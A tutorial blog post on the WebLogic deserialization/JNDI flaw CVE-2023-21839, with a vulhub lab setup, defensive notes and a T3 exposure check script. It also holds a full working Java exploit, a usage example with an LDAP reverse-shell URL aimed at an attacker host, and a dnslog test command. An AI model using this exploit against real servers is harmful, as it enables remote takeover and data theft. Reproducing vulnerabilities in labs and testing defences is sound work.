DEV Community

TutorialBoy

WebLogic Deserialization Vulnerability - CVE-2023-21839

Introduction

WebLogic is an application server produced by Oracle Corporation in the United States. More precisely, it is middleware built on the Java EE architecture. WebLogic is a Java application server for developing, integrating, deploying, and managing large-scale distributed web applications, network applications and database applications.

Vulnerability Overview

CVE-2023-21839

Because of a flaw in WebLogic's IIOP/T3 protocol handling, an unauthenticated attacker with network access to the IIOP/T3 listener can attack WebLogic Server whenever IIOP/T3 is enabled. A successful exploit lets the attacker take over the server and execute arbitrary commands, which can crash the server or leak sensitive data.

Affected Versions

  • WebLogic 12.2.1.3.0
  • WebLogic 12.2.1.4.0
  • WebLogic 14.1.1.0.0

Environment

You can use vulhub to build a vulnerability environment:

https://github.com/vulhub/vulhub/tree/master/weblogic/CVE-2023-21839

Clone the project:

```shell
git clone https://github.com/vulhub/vulhub.git
```

In the weblogic/CVE-2023-21839/ directory, use the following command to download and start WebLogic 12.2.1.3:

```shell
docker-compose up -d
```

Then visit http://your-ip:7001/console; the login page should appear.

Vulnerability Reproduction

You can use the tool by DXask88MA, which is built around this class:

weblogic.deployment.jms.ForeignOpaqueReference.class

You can also use the tool by 4ra1n, which simulates the protocol packets in Go and uses this class:

weblogic.jndi.internal.ForeignOpaqueReference.class

POC:

```java
import javax.naming.Context;
import javax.naming.InitialContext;
import javax.naming.NamingException;
import java.lang.reflect.Field;
import java.util.Hashtable;
import java.util.Random;

public class CVE_2023_21839 {
    static String JNDI_FACTORY="weblogic.jndi.WLInitialContextFactory";
    static String HOW_TO_USE="[*]java -jar Target ip:port ldap address\n e.g. java -jar 192.168.220.129:7001 ldap://192.168.31.58:1389/Basic/ReverseShell/192.168.220.129/1111";

    // Open a JNDI context to the target over the T3 protocol.
    private static InitialContext getInitialContext(String url)throws NamingException
    {
        Hashtable<String,String> env = new Hashtable<String,String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, JNDI_FACTORY);
        env.put(Context.PROVIDER_URL, url);
        return new InitialContext(env);
    }
    public static void main(String args[]) throws Exception {
        if(args.length <2){
            System.out.println(HOW_TO_USE);
            System.exit(0);
        }
        String t3Url = args[0];
        String ldapUrl = args[1];
        InitialContext c=getInitialContext("t3://"+t3Url);
        // Build a ForeignOpaqueReference whose remote JNDI name points at the LDAP URL;
        // the private fields are set via reflection because there are no setters.
        Hashtable<String,String> env = new Hashtable<String,String>();
        env.put(Context.INITIAL_CONTEXT_FACTORY, "com.sun.jndi.rmi.registry.RegistryContextFactory");
        weblogic.deployment.jms.ForeignOpaqueReference f=new weblogic.deployment.jms.ForeignOpaqueReference();
        Field jndiEnvironment=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("jndiEnvironment");
        jndiEnvironment.setAccessible(true);
        jndiEnvironment.set(f,env);
        Field remoteJNDIName=weblogic.deployment.jms.ForeignOpaqueReference.class.getDeclaredField("remoteJNDIName");
        remoteJNDIName.setAccessible(true);
        remoteJNDIName.set(f,ldapUrl);
        // Bind the reference under a random name, then look it up: resolving the
        // reference makes the server perform the JNDI lookup against the LDAP URL.
        String bindName = new Random(System.currentTimeMillis()).nextLong()+"";
        try{
            c.bind(bindName,f);
            c.lookup(bindName);
        }catch(Exception e){ }

    }
}
```

To test, use a dnslog domain together with the downloaded Jar file.

Run the command:

```shell
java -jar Weblogic-CVE-2023-21839.jar 127.0.0.1:7001 ldap://81c95c8f.dns.1433.eu.org/test
```

Check the dnslog: the request is received, which confirms the vulnerability.

Remediation
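Since the vulnerability needs a reachable T3/IIOP listener, remediation normally means disabling or filtering those protocols on the server; the following Python check, added here and not part of the original post, lets you verify afterwards that the listener no longer accepts T3. The greeting bytes and the "HELO:" reply format are assumptions taken from the publicly documented T3 handshake (the same exchange nmap's weblogic-t3-info script uses), not from this post.

```python
"""Post-remediation check: does a WebLogic port still answer the T3 handshake?"""
import re
import socket

# Client greeting of the T3 protocol (assumed from public protocol descriptions):
# protocol/version line followed by size hints, terminated by a blank line.
T3_HELLO = b"t3 12.2.1\nAS:255\nHL:19\nMS:10000000\n\n"

# A listener that accepts T3 answers "HELO:<server version>.<secure flag>" first;
# anything else (HTTP error, filter rejection, closed socket) means T3 is not served.
HELO_RE = re.compile(rb"^HELO:(?P<version>\d+(?:\.\d+)*)\.(?P<secure>true|false)\n")


def parse_t3_response(data: bytes) -> dict:
    """Classify the server's first reply to the greeting."""
    m = HELO_RE.match(data)
    if not m:
        return {"t3": False, "version": None}
    return {"t3": True, "version": m.group("version").decode()}


def t3_enabled(host: str, port: int = 7001, timeout: float = 5.0) -> dict:
    """Open one TCP connection, send the greeting and classify the reply.

    A connection error (port closed, filtered) is reported as t3=False plus an
    'error' field so the caller can tell 'rejected' from 'unreachable'.
    """
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.sendall(T3_HELLO)
            data = s.recv(1024)
    except OSError as exc:
        return {"t3": False, "version": None, "error": str(exc)}
    return parse_t3_response(data)


if __name__ == "__main__":
    import sys
    target = sys.argv[1] if len(sys.argv) > 1 else "127.0.0.1"
    result = t3_enabled(target)
    print("T3 still enabled" if result["t3"] else "T3 not accepted", result)
```

Run it against each managed server after applying the mitigation; a result of `{'t3': False, ...}` from a host that previously reported a version confirms the listener is now filtered.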

Reference link:
